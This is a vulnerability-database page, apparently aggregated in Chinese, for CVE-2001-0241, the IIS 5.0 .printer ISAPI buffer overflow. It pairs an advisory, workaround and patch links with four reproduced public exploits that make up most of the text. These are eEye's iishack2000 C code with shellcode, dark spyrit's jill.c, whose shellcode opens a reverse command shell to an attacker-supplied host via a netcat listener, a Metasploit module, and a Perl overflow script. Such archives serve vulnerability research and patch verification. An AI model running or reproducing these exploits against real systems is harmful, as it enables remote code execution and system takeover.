CVE-2001-0241
CVSS10.0
发布时间 :2001-06-27 00:00:00
修订时间 :2016-10-17 22:10:17
NMCOEP    

[原文]Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain root privileges via a long print request that is passed to the extension through IIS 5.0.


[CNNVD]Microsoft Windows 2000 IIS 5.0 .printer ISAPI扩展远程缓冲溢出漏洞(MS01-023)(CNNVD-200106-123)

        
        Microsoft Windows 2000 IIS 5.0的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系,默认情况下该映射存在。该接口可以通过WEB远程调用打印机。
        处理.printer映射的msw3prt.dll存在一个缓冲区溢出漏洞,远程攻击者可以利用此漏洞通过溢出攻击在主机上以Local System的权限执行任意指令。
        当远程用户提交对.printer的URL请求时,IIS 5.0调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏缓冲区边界检查,远程用户可以提交一个精心构造的针对.printer的URL请求,其"Host:"域包含大约420字节的数据,此时在msw3prt.dll中发生典型的缓冲区溢出,潜在允许执行任意指令。溢出发生后,WEB服务停止响应,Windows 2000可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000:::datacenter_server

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1068Windows 2000 Internet Printing ISAPI Extension Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0241
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0241
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-123
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=98874912915948&w=2
(UNKNOWN)  BUGTRAQ  20010501 Windows 2000 IIS 5.0 Remote buffer overflow vulnerability (Remote SYSTEM Level Access)
http://www.cert.org/advisories/CA-2001-10.html
(UNKNOWN)  CERT  CA-2001-10
http://www.microsoft.com/technet/security/bulletin/ms01-023.asp
(VENDOR_ADVISORY)  MS  MS01-023
http://www.securityfocus.com/bid/2674
(VENDOR_ADVISORY)  BID  2674
http://xforce.iss.net/static/6485.php
(UNKNOWN)  XF  iis-isapi-printer-bo(6485)

- 漏洞信息

Microsoft Windows 2000 IIS 5.0 .printer ISAPI扩展远程缓冲溢出漏洞(MS01-023)
危急 未知
2001-06-27 00:00:00 2005-05-02 00:00:00
远程  
        
        Microsoft Windows 2000 IIS 5.0的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系,默认情况下该映射存在。该接口可以通过WEB远程调用打印机。
        处理.printer映射的msw3prt.dll存在一个缓冲区溢出漏洞,远程攻击者可以利用此漏洞通过溢出攻击在主机上以Local System的权限执行任意指令。
        当远程用户提交对.printer的URL请求时,IIS 5.0调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏缓冲区边界检查,远程用户可以提交一个精心构造的针对.printer的URL请求,其"Host:"域包含大约420字节的数据,此时在msw3prt.dll中发生典型的缓冲区溢出,潜在允许执行任意指令。溢出发生后,WEB服务停止响应,Windows 2000可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 除非确实需要printer脚本,否则我们建议您删除printer的脚本映射。
        具体步骤为:
        1、打开"Internet 服务管理器"
        2、在选中的服务器上按鼠标右键,选择"属性",然后选择"主属性"中的"WWW 服务"
        3、选择"编辑...",然后选择"主目录",点击"配置..."
        4、从"应用程序映射"栏中删除".printer"项
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS01-023)以及相应补丁:
        MS01-023:Unchecked Buffer in ISAPI Extension Could Enable Compromise of IIS 5.0 Server
        链接:
        http://www.microsoft.com/technet/security/bulletin/ms01-023.asp

        补丁下载:
        
         。Microsoft Windows 2000:
        
        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321

        
         。Microsoft Windows 2000 Datacenter Server:
         Windows 2000数据中心服务器的补丁因硬件不同,须向原设备制造商索取。

- 漏洞信息 (266)

MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (EDBID:266)
windows remote
2001-05-07 Verified
80 Ryan Permeh
N/A [点击下载]
/***********************************************************************
iishack 2000 - eEye Digital Security - 2001
This affects all unpatched windows 2000 machines with the .printer
isapi filter loaded.  This is purely proof of concept.

Quick rundown of the exploit:
  
Eip overruns at position 260
i have 19 bytes of code to jump back to the beginning of the buffer.
(and a 4 byte eip jumping into a jmp esp located in mfc42.dll).  The 
jumpback was kinda weird, requiring a little forward padding to protect 
the rest of the code.
  
The buffer itself:
Uou only have about 250ish bytes before the overflow(taking into 
account the eip and jumpback), and like 211 after it.  this makes
things tight.  This is why i hardcoded the offsets and had 2 shellcodes,
one for each revision.  normally, this would suck, but since iis is kind
to us, it cleanly restarts itself if we blow it, giving us another chance.

This should compile clean on windows, linux and *bsd.  Other than that, you 
are on your own, but the vector is a simple tcp vector, so no biggie.

The vector:

the overflow happens in the isapi handling the .printer extension.  The actual
overflow is in the Host: header.  This buffer is a bit weird, soi be carfull 
what you pass into it.  It has a minimal amount of parsing happening before 
we get it, making some chars not able to be used(or forcing you to encode 
your payload).  As far as i can tell, the bad bytes i've come across are:

0x00(duh)
0x0a(this inits a return, basically flaking our buffer)
0x0d(same as above)
0x3a(colon: - this seems to be a separator of some kind, didn't have time or 
  energy to reverse it any further,  it breaks stuff, keep it out of 
  your buffer)
  
i have a feeling that there are more bad chars, but in the shellcode i've written
(both this proof of concept and actual port binding shellcode),  i've come across
problems, but haven't specifically tagged a "bad" char.


One more thing...  inititally, i got this shellcode to fit on the left side of 
the buffer overflow.  something strange was causing it to fail if i had a length 
of under about 315 chars.  This seems strange to me, but it could be soemthing i 
just screwed up writing this code.  This explains the 0x03s padding the end of the
shellcode.
  
Ryan Permeh
ryan@eeye.com

greetz: riley, for finding the hole
  marc, for being a cool boss
  dale,nicula,firas, for being pimps
  greg hoglund, for sparking some really interesting ideas on exploitable buffers
  dark spyrit, for beginning the iis hack tradition
  I would also like to thank the academy and to all of those who voted....
  Barry, Levonne, and their $240.00 worth of pudding.
  http://www.eeye.com/html/research/Advisories/tequila.jpg
*************************************************************************/

#ifdef _WIN32
#include <Winsock2.h>
#include <Windows.h>
#define snprintf _snprintf
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#include <stdio.h>

void usage();
unsigned char GetXORValue(char *szBuff, unsigned long filesize);

unsigned char sc[2][315]={
  "\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb"
  "\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76"
  "\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07"
  "\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80"
  "\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01"
  "\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53"
  "\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b"
  "\xfc\xfc\xfc\xfc\xcb\xa5\xeb\x74\x8e\x28\xea\x74\xb8\xb3\xeb\x74\x27\x49"
  "\xea\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d"
  "\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46"
  "\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77"
  "\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a"
  "\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46"
  "\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03"
  "\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a"
  "\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03"
  "\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00" 
  "\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb"
  "\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76"
  "\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07"
  "\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80"
  "\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01"
  "\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53"
  "\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b"
  "\xfc\xfc\xfc\xfc\x50\x33\xeb\x74\xf7\x86\xeb\x74\x2e\xf0\xeb\x74\x4c\x30"
  "\xeb\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d"
  "\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46"
  "\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77"
  "\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a"
  "\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46"
  "\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03"
  "\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a"
  "\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03"
  "\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00"
};

main (int argc, char *argv[])
{
  char request_message[500];
  int X,sock,sp=0;
  unsigned short serverport=htons(80);
  struct hostent *nametocheck;
  struct sockaddr_in serv_addr;
  struct in_addr attack;
#ifdef _WIN32
  WORD werd;
  WSADATA wsd;
  werd= MAKEWORD(2,0);
  WSAStartup(werd,&wsd);
#endif
  printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n");
  printf("Vulnerability found by Riley Hassell <riley@eeye.com>\n");
  printf("Exploit by Ryan Permeh <ryan@eeye.com>\n");
  if(argc < 4) usage();
  if(argv[1] != NULL)
  {
    nametocheck = gethostbyname (argv[1]);
    memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
  }
  else usage();  
  if(argv[2] != NULL)
  {
    serverport=ntohs((unsigned short)atoi(argv[2]));
  }  
  if(argv[3] != NULL)
  {
    sp=atoi(argv[3]);
  }  
  printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
  memset(request_message,0x00,500);
  snprintf(request_message,500,"GET /null.printer HTTP/1.1\r\nHost: %s\r\n\r\n",sc[sp]);
  sock = socket (AF_INET, SOCK_STREAM, 0);
  memset (&serv_addr, 0, sizeof (serv_addr));
  serv_addr.sin_family=AF_INET;
  serv_addr.sin_addr.s_addr = attack.s_addr;
  serv_addr.sin_port = serverport;
  X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
  if(X==0)
  {
    send(sock,request_message,strlen(request_message)*sizeof(char),0);
    printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
    printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
  }
  else
  {
    printf("Couldn't connect\n",inet_ntoa(attack));
  }
#ifdef _WIN32
  closesocket(sock); 
#else
  close(sock);
#endif
  return 0;
}
void usage()
{
  printf("Syntax:   iishack2000 <hostname> <server port> <service pack>\n");
  printf("Example: iishack2000 127.0.0.1 80 0\n");
  printf("Example: iishack2000 127.0.0.1 80 1\n");  
  exit(1);
}


// milw0rm.com [2001-05-07]
		

- 漏洞信息 (268)

MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2) (EDBID:268)
windows remote
2001-05-08 Verified
80 dark spyrit
N/A [点击下载]
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
 *
 *  by: dark spyrit <dspyrit@beavuh.org>
 *
 *  respect to eeye for finding this one - nice work.
 *  shouts to halvar, neofight and the beavuh bitchez.
 *
 *  this exploit overwrites an exception frame to control eip and get to
 *  our code.. the code then locates the pointer to our larger buffer and
 *  execs.
 *
 *  usage: jill <victim host> <victim port> <attacker host> <attacker port>
 *
 *  the shellcode spawns a reverse cmd shell.. so you need to set up a
 *  netcat listener on the host you control.
 *
 *  Ex: nc -l -p <attacker port> -vv
 *
 *  I haven't slept in years.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

int main(int argc, char *argv[]){

/* the whole request rolled into one, pretty huh? carez. */

unsigned char sploit[]=
  "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
  "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
  "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
  "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
  "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
  "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
  "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
  "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
  "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
  "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
  "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
  "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
  "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
  "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
  "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
  "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
  "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
  "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
  "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
  "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
  "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
  "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
  "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
  "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
  "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
  "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
  "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
  "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
  "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
  "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
  "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
  "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
  "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
  "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
  "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
  "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
  "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
  "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
  "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
  "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
  "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
  "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
  "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
  "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
  "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
  "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";

  int       s;
  unsigned short int  a_port;
  unsigned long    a_host;
  struct hostent    *ht;
  struct sockaddr_in  sin;

  printf("iis5 remote .printer overflow.\n"
    "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");

  if (argc != 5){
    printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
    exit(1);
  }
  
  if ((ht = gethostbyname(argv[1])) == 0){
    herror(argv[1]);
    exit(1);
  }
  
  sin.sin_port = htons(atoi(argv[2]));
  a_port = htons(atoi(argv[4]));
  a_port^=0x9595;

  sin.sin_family = AF_INET;
  sin.sin_addr = *((struct in_addr *)ht->h_addr);
  
  if ((ht = gethostbyname(argv[3])) == 0){
    herror(argv[3]);
    exit(1);
  }
  
  a_host = *((unsigned long *)ht->h_addr);
  a_host^=0x95959595;

  sploit[441]= (a_port) & 0xff;
  sploit[442]= (a_port >> 8) & 0xff;

  sploit[446]= (a_host) & 0xff;
  sploit[447]= (a_host >> 8) & 0xff;
  sploit[448]= (a_host >> 16) & 0xff;
  sploit[449]= (a_host >> 24) & 0xff;

  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    perror("socket");
    exit(1);
  }
  
  printf("\nconnecting... \n");
  if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
    perror("connect");
    exit(1);
  }
  
  write(s, sploit, strlen(sploit));
  sleep (1);
  close (s);
  
  printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
  exit(0);
}  


// milw0rm.com [2001-05-08]
		

- 漏洞信息 (16469)

Microsoft IIS 5.0 Printer Host Header Overflow (EDBID:16469)
windows remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms01_023_printer.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS 5.0 Printer Host Header Overflow',
			'Description'    => %q{
					This exploits a buffer overflow in the request processor of
				the Internet Printing Protocol ISAPI module in IIS. This
				module works against Windows 2000 service pack 0 and 1. If
				the service stops responding after a successful compromise,
				run the exploit a couple more times to completely kill the
				hung process.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2001-0241'],
					[ 'OSVDB', '3323'],
					[ 'BID', '2674'],
					[ 'MSB', 'MS01-023'],
					[ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 900,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Windows 2000 English SP0-SP1',
						{
							'Platform' => 'win',
							'Ret'      => 0x732c45f3,
						},
					],
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'May 1 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(80)
			], self.class)
	end


	def check
		connect
		sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect

		if !(resp and resp =~ /Error in web printer/)
			return Exploit::CheckCode::Safe
		end

		connect
		sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n")
		resp = sock.get_once
		disconnect

		if (resp and resp =~ /locked out/)
			print_status("The IUSER account is locked out, we can't check")
			return Exploit::CheckCode::Detected
		end

		if (resp and resp.index("HTTP/1.1 500") >= 0)
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		buf = make_nops(280)
		buf[268, 4] = [target.ret].pack('V')

		# payload is at: [ebx + 96] + 256 + 64
		buf << "\x8b\x4b\x60"        # mov ecx, [ebx + 96]
		buf << "\x80\xc1\x40"        # add cl, 64
		buf << "\x80\xc5\x01"        # add ch, 1
		buf << "\xff\xe1"            # jmp ecx

		sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

		handler
		disconnect
	end

end
		

- 漏洞信息 (20815)

Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1) (EDBID:20815)
windows remote
2001-05-01 Verified
0 storm
N/A [点击下载]
source: http://www.securityfocus.com/bid/2674/info

Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.

* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. 

#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with sucess against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol 
# This code was written after eEye brought this issue in BugTraq.


use Socket;


print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";

if (not $ARGV[0]) {
	print qq~
 		Usage: webexplt.pl <host>
	~; 
exit;}


$ip=$ARGV[0];

print "Sending Exploit Code to host: " . $ip . "\n\n";
my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
print "Results:\n";

if (not @results) {
	print "The Machine tested has the IPP Vulnerability!";
}
